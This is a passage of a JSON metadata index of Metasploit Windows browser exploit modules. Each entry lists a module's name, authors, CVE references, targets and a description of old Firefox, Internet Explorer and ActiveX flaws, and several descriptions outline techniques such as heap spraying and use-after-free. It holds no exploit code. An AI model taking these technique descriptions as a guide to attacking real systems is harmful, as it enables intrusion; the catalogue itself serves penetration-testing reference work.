"URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Firefox 3.6.16 on Windows XP SP3",
"Firefox 3.6.16 on Windows 7 + Java"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/mozilla_mchannel.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_mchannel",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_nssvgvalue": {
"name": "Firefox nsSVGValue Out-of-Bounds Access Vulnerability",
"full_name": "exploit/windows/browser/mozilla_nssvgvalue",
"rank": 200,
"disclosure_date": "2011-12-06",
"type": "exploit",
"author": [
"regenrecht",
"Lincoln <lincoln@corelan.be>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1).\n The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y)\n uses a loop which can result in an out-of-bounds access to attacker-controlled memory.\n The mObserver ElementAt() function (which picks up pointers), does not validate\n if a given index is out of bound. If a custom observer of nsSVGValue is created,\n which removes elements from the original observer,\n and memory layout is manipulated properly, the ElementAt() function might pick up\n an attacker provided pointer, which can be leveraged to gain remote arbitrary\n code execution.",
"references": [
"CVE-2011-3658",
"OSVDB-77953",
"ZDI-12-056",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708186"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP - Firefox 7",
"Windows XP - Firefox 8 (<= 8.0.1)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mozilla_nssvgvalue.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_nssvgvalue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_nstreerange": {
"name": "Mozilla Firefox \"nsTreeRange\" Dangling Pointer Vulnerability",
"full_name": "exploit/windows/browser/mozilla_nstreerange",
"rank": 300,
"disclosure_date": "2011-02-02",
"type": "exploit",
"author": [
"regenrecht",
"xero"
],
"description": "This module exploits a code execution vulnerability in Mozilla Firefox\n 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n By overwriting a subfunction of invalidateSelection it is possible to free the\n nsTreeRange object that the function currently operates on.\n Any further operations on the freed object can result in remote code execution.\n Utilizing the call setup the function provides it's possible to bypass DEP\n without the need for a ROP. Sadly this exploit is still either dependent\n on Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n modules anymore.",
"references": [
"CVE-2011-0073",
"OSVDB-72087",
"BID-47663",
"ZDI-11-157",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=630919",
"URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto (Direct attack against Windows XP, otherwise through Java, if enabled)",
"Firefox Runtime, fails with ASLR",
"Java Runtime (7.10.3052.4), best against ASLR",
"Java JVM (20.1.0.02)",
"Java Regutils (6.0.260.3)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mozilla_nstreerange.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_nstreerange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_reduceright": {
"name": "Mozilla Firefox Array.reduceRight() Integer Overflow",
"full_name": "exploit/windows/browser/mozilla_reduceright",
"rank": 300,
"disclosure_date": "2011-06-21",
"type": "exploit",
"author": [
"Chris Rohlf",
"Yan Ivnitskiy",
"Matteo Memelli",
"dookie2000ca",
"sinn3r <sinn3r@metasploit.com>",
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits a vulnerability found in Mozilla Firefox 3.6. When an\n array object is configured with a large length value, the reduceRight() method\n may cause an invalid index being used, allowing arbitrary remote code execution.\n Please note that the exploit requires a longer amount of time (compare to a\n typical browser exploit) in order to gain control of the machine.",
"references": [
"CVE-2011-2371",
"OSVDB-73184",
"EDB-17974",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=664009"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Mozilla Firefox 3.6.16 (no JAVA)",
"Mozilla Firefox 3.6.16 (JAVA)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/mozilla_reduceright.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_reduceright",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms03_020_ie_objecttype": {
"name": "MS03-020 Microsoft Internet Explorer Object Type",
"full_name": "exploit/windows/browser/ms03_020_ie_objecttype",
"rank": 300,
"disclosure_date": "2003-06-04",
"type": "exploit",
"author": [
"skape <mmiller@hick.org>"
],
"description": "This module exploits a vulnerability in Internet Explorer's\n handling of the OBJECT type attribute.",
"references": [
"CVE-2003-0344",
"OSVDB-2967",
"BID-7806",
"MSB-MS03-020"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT/XP/2003 Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms03_020_ie_objecttype",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms05_054_onload": {
"name": "MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution",
"full_name": "exploit/windows/browser/ms05_054_onload",
"rank": 300,
"disclosure_date": "2005-11-21",
"type": "exploit",
"author": [
"Benjamin Tobias Franz",
"Stuart Pearson",
"Sam Sharps"
],
"description": "This bug is triggered when the browser handles a JavaScript 'onLoad' handler in\n conjunction with an improperly initialized 'window()' JavaScript function.\n This exploit results in a call to an address lower than the heap. The javascript\n prompt() places our shellcode near where the call operand points to. We call\n prompt() multiple times in separate iframes to place our return address.\n We hide the prompts in a popup window behind the main window. We spray the heap\n a second time with our shellcode and point the return address to the heap. I use\n a fairly high address to make this exploit more reliable. IE will crash when the\n exploit completes. Also, please note that Internet Explorer must allow popups\n in order to continue exploitation.",
"references": [
"MSB-MS05-054",
"CVE-2005-1790",
"OSVDB-17094",
"BID-13799",
"URL-http://www.cvedetails.com/cve/CVE-2005-1790"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Internet Explorer 6 on Windows XP",
"Internet Explorer 6 Windows 2000"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms05_054_onload.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms05_054_onload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_001_wmf_setabortproc": {
"name": "Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",
"full_name": "exploit/windows/browser/ms06_001_wmf_setabortproc",
"rank": 500,
"disclosure_date": "2005-12-27",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"san <san@xfocus.org>",
"O600KO78RUS <O600KO78RUS@unknown.ru>"
],
"description": "This module exploits a vulnerability in the GDI library included with\n Windows XP and 2003. This vulnerability uses the 'Escape' metafile function\n to execute arbitrary code through the SetAbortProc procedure. This module\n generates a random WMF record stream for each request.",
"references": [
"CVE-2005-4560",
"OSVDB-21987",
"MSB-MS06-001",
"BID-16074",
"URL-http://www.microsoft.com/technet/security/advisory/912840.mspx",
"URL-http://wvware.sourceforge.net/caolan/ora-wmf.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP/2003/Vista Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_001_wmf_setabortproc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_013_createtextrange": {
"name": "MS06-013 Microsoft Internet Explorer createTextRange() Code Execution",
"full_name": "exploit/windows/browser/ms06_013_createtextrange",
"rank": 300,
"disclosure_date": "2006-03-19",
"type": "exploit",
"author": [
"Faithless <rhyskidd@gmail.com>",
"Darkeagle <unl0ck.net>",
"hdm <x@hdm.io>",
"justfriends4n0w <justfriends4n0w@yahoo.com>",
"Unknown"
],
"description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer.\n Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under\n certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point\n to a very remote, non-existent memory location. This module is the result of merging three\n different exploit submissions and has only been reliably tested against Windows XP SP2.\n This vulnerability was independently discovered by multiple parties. The heap spray method\n used by this exploit was pioneered by Skylined.",
"references": [
"CVE-2006-1359",
"OSVDB-24050",
"MSB-MS06-013",
"BID-17196",
"US-CERT-VU-876678",
"URL-http://secunia.com/secunia_research/2006-7/advisory/",
"URL-https://seclists.org/lists/bugtraq/2006/Mar/0410.html",
"URL-https://seclists.org/lists/fulldisclosure/2006/Mar/1439.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)",
"Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/browser/ms06_013_createtextrange.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_013_createtextrange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_055_vml_method": {
"name": "MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution",
"full_name": "exploit/windows/browser/ms06_055_vml_method",
"rank": 300,
"disclosure_date": "2006-09-19",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Aviv Raff <avivra@gmail.com>",
"Trirat Puttaraksa (Kira) <trir00t@gmail.com>",
"Mr.Niega <Mr.Niega@gmail.com>",
"M. Shirk <shirkdog_list@hotmail.com>"
],
"description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer using\n a buffer overflow in the VML processing code (VGX.dll). This module has been tested on\n Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.",
"references": [
"CVE-2006-4868",
"OSVDB-28946",
"MSB-MS06-055",
"BID-20096"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT 4.0 -> Windows 2003 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms06_055_vml_method.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_055_vml_method",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_057_webview_setslice": {
"name": "MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow",
"full_name": "exploit/windows/browser/ms06_057_webview_setslice",
"rank": 300,
"disclosure_date": "2006-07-17",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a flaw in the WebViewFolderIcon ActiveX control\n included with Windows 2000, Windows XP, and Windows 2003. This flaw was published\n during the Month of Browser Bugs project (MoBB #18).",
"references": [
"CVE-2006-3730",
"OSVDB-27110",
"MSB-MS06-057",
"BID-19030"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / IE 6.0SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms06_057_webview_setslice.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_057_webview_setslice",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_067_keyframe": {
"name": "MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability",
"full_name": "exploit/windows/browser/ms06_067_keyframe",
"rank": 300,
"disclosure_date": "2006-11-14",
"type": "exploit",
"author": [
"Alexander Sotirov <asotirov@determina.com>",
"skape <mmiller@hick.org>"
],
"description": "This module exploits a heap overflow vulnerability in the KeyFrame method of the\n direct animation ActiveX control. This is a port of the exploit implemented by\n Alexander Sotirov.",
"references": [
"CVE-2006-4777",
"OSVDB-28842",
"BID-20047",
"MSB-MS06-067"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000/XP/2003 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms06_067_keyframe.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_067_keyframe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_071_xml_core": {
"name": "MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling",
"full_name": "exploit/windows/browser/ms06_071_xml_core",
"rank": 300,
"disclosure_date": "2006-10-10",
"type": "exploit",
"author": [
"Trirat Puttaraksa <trir00t@gmail.com>"
],
"description": "This module exploits a code execution vulnerability in Microsoft XML Core Services which\n exists in the XMLHTTP ActiveX control. This module is the modified version of\n http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully\n tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6\n + Microsoft XML Core Services 4.0 SP2.",
"references": [
"CVE-2006-5745",
"OSVDB-29425",
"MSB-MS06-071",
"BID-20915"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 -> Windows 2003 SP0"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/ms06_071_xml_core.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_071_xml_core",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms07_017_ani_loadimage_chunksize": {
"name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",
"full_name": "exploit/windows/browser/ms07_017_ani_loadimage_chunksize",
"rank": 500,
"disclosure_date": "2007-03-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Solar Eclipse <solareclipse@phreedom.org>"
],
"description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function in USER32.dll. The flaw can be triggered through\n Internet Explorer 6 and 7 by using the CURSOR style sheet directive\n to load a malicious .ANI file. The module can also exploit Mozilla\n Firefox by using a UNC path in a moz-icon URL and serving the .ANI file\n over WebDAV. The vulnerable code in USER32.dll will catch any\n exceptions that occur while the invalid cursor is loaded, causing the\n exploit to silently fail when the wrong target has been chosen.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.",
"references": [
"CVE-2007-0038",
"OSVDB-33629",
"BID-23194",
"MSB-MS07-017",
"URL-http://www.microsoft.com/technet/security/advisory/935423.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista",
"IE6 on Windows NT, 2000, XP, 2003 (all languages)",
"IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)",
"IE7 and Firefox on Windows Vista (all languages)",
"Firefox on Windows XP (English)",
"Firefox on Windows 2003 (English)"
],
"mod_time": "2017-10-19 19:55:58 +0000",
"path": "/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms07_017_ani_loadimage_chunksize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms08_041_snapshotviewer": {
"name": "Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download",
"full_name": "exploit/windows/browser/ms08_041_snapshotviewer",
"rank": 600,
"disclosure_date": "2008-07-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Microsoft Office Snapshot Viewer ActiveX Control.",
"references": [
"CVE-2008-2463",
"OSVDB-46749",
"MSB-MS08-041",
"BID-30114"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms08_041_snapshotviewer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms08_053_mediaencoder": {
"name": "Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/ms08_053_mediaencoder",
"rank": 300,
"disclosure_date": "2008-09-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Windows Media Encoder 9. When\n sending an overly long string to the GetDetailsString() method of wmex.dll\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-3008",
"OSVDB-47962",
"BID-31065",
"MSB-MS08-053"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2-SP3 IE 6.0 SP0-SP2"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms08_053_mediaencoder.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms08_053_mediaencoder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms08_070_visual_studio_msmask": {
"name": "Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/ms08_070_visual_studio_msmask",
"rank": 300,
"disclosure_date": "2008-08-13",
"type": "exploit",
"author": [
"koshi",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.\n When passing a specially crafted string to the Mask parameter of the\n Mdmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2008-3704",
"OSVDB-47475",
"BID-30674",
"MSB-MS08-070"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 IE 6.0 SP0-SP2"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms08_070_visual_studio_msmask",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms08_078_xml_corruption": {
"name": "MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption",
"full_name": "exploit/windows/browser/ms08_078_xml_corruption",
"rank": 300,
"disclosure_date": "2008-12-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the data binding feature of Internet\n Explorer. In order to execute code reliably, this module uses the .NET DLL\n memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n used to create a fake vtable at a known location with all methods pointing\n to our payload. Since the .text segment of the .NET DLL is non-writable, a\n prefixed code stub is used to copy the payload into a new memory segment and\n continue execution from there.",
"references": [
"CVE-2008-4844",
"OSVDB-50622",
"BID-32721",
"MSB-MS08-078",
"URL-http://www.microsoft.com/technet/security/advisory/961051.mspx",
"URL-http://taossa.com/archive/bh08sotirovdowd.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms08_078_xml_corruption.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms08_078_xml_corruption",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms09_002_memory_corruption": {
"name": "MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption",
"full_name": "exploit/windows/browser/ms09_002_memory_corruption",
"rank": 300,
"disclosure_date": "2009-02-10",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "This module exploits an error related to the CFunctionPointer function when attempting\n to access uninitialized memory. A remote attacker could exploit this vulnerability to\n corrupt memory and execute arbitrary code on the system with the privileges of the victim.",
"references": [
"CVE-2009-0075",
"OSVDB-51839",
"MSB-MS09-002"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2-SP3 / Windows Vista SP0 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms09_002_memory_corruption.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms09_002_memory_corruption",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms09_043_owc_htmlurl": {
"name": "Microsoft OWC Spreadsheet HTMLURL Buffer Overflow",
"full_name": "exploit/windows/browser/ms09_043_owc_htmlurl",
"rank": 300,
"disclosure_date": "2009-08-11",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Microsoft's Office Web Components.\n When passing an overly long string as the \"HTMLURL\" parameter an attacker can\n execute arbitrary code.",
"references": [
"CVE-2009-1534",
"OSVDB-56916",
"BID-35992",
"MSB-MS09-043",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 - IE6 - Office XP SP0",
"Windows XP SP3 - IE6 - Office XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms09_043_owc_htmlurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms09_043_owc_msdso": {
"name": "Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption",
"full_name": "exploit/windows/browser/ms09_043_owc_msdso",
"rank": 300,
"disclosure_date": "2009-07-13",
"type": "exploit",
"author": [
"unknown",
"hdm <x@hdm.io>",
"Ahmed Obied",
"DSR! <xchwarze@gmail.com>"
],
"description": "This module exploits a memory corruption vulnerability within versions 10 and 11 of\n the Office Web Component Spreadsheet ActiveX control. This module was based on\n an exploit found in the wild.",
"references": [
"CVE-2009-1136",
"OSVDB-55806",
"MSB-MS09-043",
"URL-http://ahmed.obied.net/software/code/exploits/ie_owc.py",
"EDB-9163",
"URL-http://www.microsoft.com/technet/security/advisory/973472.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms09_043_owc_msdso.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms09_043_owc_msdso",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms09_072_style_object": {
"name": "MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption",
"full_name": "exploit/windows/browser/ms09_072_style_object",
"rank": 300,
"disclosure_date": "2009-11-20",
"type": "exploit",
"author": [
"securitylab.ir <K4mr4n_st@yahoo.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the getElementsByTagName function\n as implemented within Internet Explorer.",
"references": [
"MSB-MS09-072",
"CVE-2009-3672",
"OSVDB-50622",
"BID-37085",
"URL-http://www.microsoft.com/technet/security/advisory/977981.mspx",
"URL-http://taossa.com/archive/bh08sotirovdowd.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms09_072_style_object.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms09_072_style_object",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_002_aurora": {
"name": "MS10-002 Microsoft Internet Explorer \"Aurora\" Memory Corruption",
"full_name": "exploit/windows/browser/ms10_002_aurora",
"rank": 300,
"disclosure_date": "2010-01-14",
"type": "exploit",
"author": [
"unknown",
"hdm <x@hdm.io>"
],
"description": "This module exploits a memory corruption flaw in Internet Explorer. This\n flaw was found in the wild and was a key component of the \"Operation Aurora\"\n attacks that lead to the compromise of a number of high profile companies. The\n exploit code is a direct port of the public sample published to the Wepawet\n malware analysis site. The technique used by this module is currently identical\n to the public sample, as such, only Internet Explorer 6 can be reliably exploited.",
"references": [
"MSB-MS10-002",
"CVE-2010-0249",
"OSVDB-61697",
"URL-http://www.microsoft.com/technet/security/advisory/979352.mspx",
"URL-http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms10_002_aurora.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_002_aurora",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_002_ie_object": {
"name": "MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free",
"full_name": "exploit/windows/browser/ms10_002_ie_object",
"rank": 300,
"disclosure_date": "2010-01-21",
"type": "exploit",
"author": [
"Peter Vreugdenhil",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Internet Explorer's\n mshtml component. Due to the way IE handles objects in memory, it is\n possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext\n to be used even after it gets freed, therefore allowing remote code\n execution under the context of the user.\n\n This particular vulnerability was also one of 2012's Pwn2Own\n challenges, and was later explained by Peter Vreugdenhil with exploitation\n details. Instead of Peter's method, this module uses heap spraying like\n the 99% to store a specially crafted memory layout before re-using the\n freed memory.",
"references": [
"MSB-MS10-002",
"CVE-2010-0248",
"OSVDB-61914",
"URL-http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup",
"ZDI-10-014"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7 SP0"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms10_002_ie_object.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_002_ie_object",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_018_ie_behaviors": {
"name": "MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free",
"full_name": "exploit/windows/browser/ms10_018_ie_behaviors",
"rank": 400,
"disclosure_date": "2010-03-09",
"type": "exploit",
"author": [
"unknown",
"Trancer <mtrancer@gmail.com>",
"Nanika",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability within the DHTML behaviors\n functionality of Microsoft Internet Explorer versions 6 and 7. This bug was\n discovered being used in-the-wild and was previously known as the \"iepeers\"\n vulnerability. The name comes from Microsoft's suggested workaround to block\n access to the iepeers.dll file.\n\n According to Nico Waisman, \"The bug itself is when trying to persist an object\n using the setAttribute, which end up calling VariantChangeTypeEx with both the\n source and the destination being the same variant. So if you send as a variant\n an IDISPATCH the algorithm will try to do a VariantClear of the destination before\n using it. This will end up on a call to PlainRelease which deref the reference\n and clean the object.\"\n\n NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.",
"references": [
"CVE-2010-0806",
"OSVDB-62810",
"BID-38615",
"URL-http://www.microsoft.com/technet/security/advisory/981374.mspx",
"URL-http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/",
"URL-http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html",
"MSB-MS10-018"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista",
"IE 6 SP0-SP2 (onclick)",
"IE 7.0 (marquee)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_018_ie_behaviors",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_018_ie_tabular_activex": {
"name": "MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption",
"full_name": "exploit/windows/browser/ms10_018_ie_tabular_activex",
"rank": 400,
"disclosure_date": "2010-03-09",
